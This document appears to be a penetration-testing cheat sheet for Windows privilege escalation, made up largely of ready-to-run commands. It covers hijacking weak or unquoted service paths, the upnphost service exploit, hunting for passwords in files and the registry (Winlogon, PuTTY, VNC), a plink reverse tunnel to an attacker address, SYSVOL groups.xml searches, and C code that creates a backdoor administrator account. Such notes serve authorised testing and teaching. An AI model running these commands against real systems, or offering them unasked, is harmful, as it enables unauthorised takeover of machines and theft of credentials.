Please read the Disclaimer.
Host Information
Get OS version, patches, etc.:
systeminfo
type C:\Windpws\system32\eula.txt
type C:\BOOT.INI
Get current user:
whoami
whoami /priv
echo %username%
Get environment variables:
set
List users:
net accounts
net group
net users
List user details:
net users <user>
Network information:
ipconfig /all
Routing information:
netstat -r
route print
arp -a
Firewall information:
netsh firewall show state
netsh firewall show config
List open connections:
netstat -aton
List Scheduled tasks:
schtasks /query /fo LIST /v
Services
List Windows services:
net start
tasklist /SV
wmic service list brief
sc query state= all
Weak Services
Find misconfigured permissions by finding executables and running icalcs
or cacls
commands to determine user permissions. If lucky they may have full (F) or modified (M) permissions for the current user.
Also look for ones with a space in a file folder such as C:\Program Files
that runs as SYSTEM/Administrator
.
On newer machines:
icacls "C:\<path-to-service>.exe"
Older machines:
cacls "C:\<path-to-service>.exe"
If wmic
is available a list can be pulled:
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\" |findstr /i /v """
Change a weak service by replacing the executable with a malicious one:
move <evil-file>.exe "C:\Program Files\<service>\<file>.exe"
Then reboot the server or wait for system to restart it.
Or if possible, inject the service path:
sc config <service> binpath= "<exploit-code>"
Then restart the service:
sc stop <service>
sc start <service>
Windows XP SP1
Windows XP SP1 has a known vulnerability in upnphost
.
First start by making sure its dependency and service is running:
sc config SSDPSRV start= auto
net start SSDPSRV
Then change the executable path:
sc config upnphost binpath= "<exploit-code>"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
Then start the service:
net start upnphost
If both wmic
and sc
are not available, use accesschk
: 🔗 https://download.sysinternals.com/files/AccessChk.zip
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
Space in Service Path
If the above service search came up with a path such as:
C:\Program Files\<service>\<file>.exe
This could allow a malicious .exe file to be placed in:
C:\Program.exe
Start/Stop with Denied Permissions
If a service gives a permission denied to start or stop, this may or may not be exploitable. This is outlined nicely here: 🔗 http://woshub.com/set-permissions-on-windows-service/
Search Files and Registry
List current directory with metadata, system and data stream files:
dir /s /q /R
Attempt to find password strings in common files:
findstr /spin password *.txt
findstr /spin password *.xml
findstr /spin password *.config
findstr /si password *.ini
findstr /spin credentials *.txt
findstr /spin credentials *.xml
findstr /spin credentials *.config
findstr /si credentials *.ini
findstr /spin secret *.txt
findstr /spin secret *.xml
findstr /spin secret *.config
findstr /si secret *.ini
Attempt to find password strings in all files:
findstr /spin "password" *.*
findstr /spin "credentials" *.*
findstr /spin "secret" *.*
Find all common configuration or sensitive files:
dir/q \*.txt /s
dir/q \*.rar /s
dir/q \*.zip /s
dir/q \*.xls /s
dir/q \*.xlsx /s
dir/q \*.ini /s
dir/q \*.cap /s
dir/q \*.pcap /s
dir/q \*.exe /s
dir/q \*.pdf /s
Attempt to find password strings in registry settings:
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
Port Forwarding
Using plink.exe. Recommend using secondary user from attacking machine:
plink.exe -l <user> -pw <password> <attacking-ipaddress> -R <lport>:127.0.0.1:<rport>
Network Drives
Find Users Mapped Drives
Show current mapped drives:
net share
Search registry for user SID:
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\" /s
Then finding the SID, get the network paths and usernames used to connect, if any:
reg query "HKEY_USERS\<SID>\Network" /s
Map a Drive
Create a network drive:
net use Z: \\<path>\
Map to Domain Controller sysvol
:
net use Z: \\<dc>\SYSVOL
Search for group policy xml
:
z:
dir /s /q groups.xml
Kernel
Search kernel vulnerabilities.
Windows Exploit Suggester
Copy systeminfo
to a text file on attacking machine.
Download Windows Exploit Suggester:
wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py
Download bulletin database:
wget http://download.microsoft.com/download/6/7/3/673E4349-1CA5-40B9-8879-095C72D5B49D/BulletinSearch.xlsx
Install requirements:
apt -y install python-xlrd
Run:
python windows-exploit-suggester.py --systeminfo systeminfo.txt --database BulletinSearch.xlsx
Common Simple Overwrite Code
Create an admin user and add to administrator and remote desktop groups:
#include <stdlib.h>
int main ()
{
system("net user <user> <password> /add");
system("net localgroup administrators <user> /add");
system("net localgroup administrators "Remote Desktop Users" <user> /add");
return 0;
}
Compile:
i686-w64-mingw32-gcc <file>.c -lws2_32 -o <output>.exe